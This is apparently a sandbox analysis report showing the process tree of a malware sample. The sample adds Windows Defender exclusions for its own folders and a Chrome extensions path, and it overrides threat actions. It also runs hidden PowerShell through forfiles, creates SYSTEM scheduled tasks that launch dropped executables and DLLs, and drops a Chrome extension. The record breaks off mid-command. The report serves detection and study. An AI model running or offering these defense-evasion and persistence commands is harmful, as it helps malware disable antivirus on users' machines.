C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\jLjeNaiUMFXhhNbk\kVxIoeLX\YLRnCRaKAUDEdEbE.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\jLjeNaiUMFXhhNbk\kVxIoeLX\YLRnCRaKAUDEdEbE.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LyeaCXeAXIXykqmfO" /SC once /ST 10:43:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exe\" lW /iTkCdidGa 385135 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 3283⤵
- Program crash
-
C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exeC:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exe lW /iTkCdidGa 385135 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKPbLIPtdWjYWtgKbM"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TGSqLNfOU\NDYUDM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkutRMUCKyfxaPV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rkutRMUCKyfxaPV2" /F /xml "C:\Program Files (x86)\TGSqLNfOU\mLutPpa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ymGpHCUadFDCAu" /F /xml "C:\Program Files (x86)\jbywMxbyABuU2\yldDABG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KIJZzoLWERVEa2" /F /xml "C:\ProgramData\tvOexZGeSXRtrQVB\MuqKIEN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cKCvNSfFKKPlDebmW2" /F /xml "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\oOEgyeT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIVMXXvuSFGZiLTKXPV2" /F /xml "C:\Program Files (x86)\vZXYUjRGERiGC\LqbEsou.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WEqRGXvoovdTvsnPk" /SC once /ST 05:06:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll\",#1 /rHdidW 385135" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WEqRGXvoovdTvsnPk"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 6683⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exeC:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe M5 /dNcdidaLlL 385135 /S2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LyeaCXeAXIXykqmfO" /SC once /ST 01:47:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exe\" lW /Kthhdidkj 385135 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 6243⤵
- Program crash
-
C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exeC:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exe lW /Kthhdidkj 385135 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden 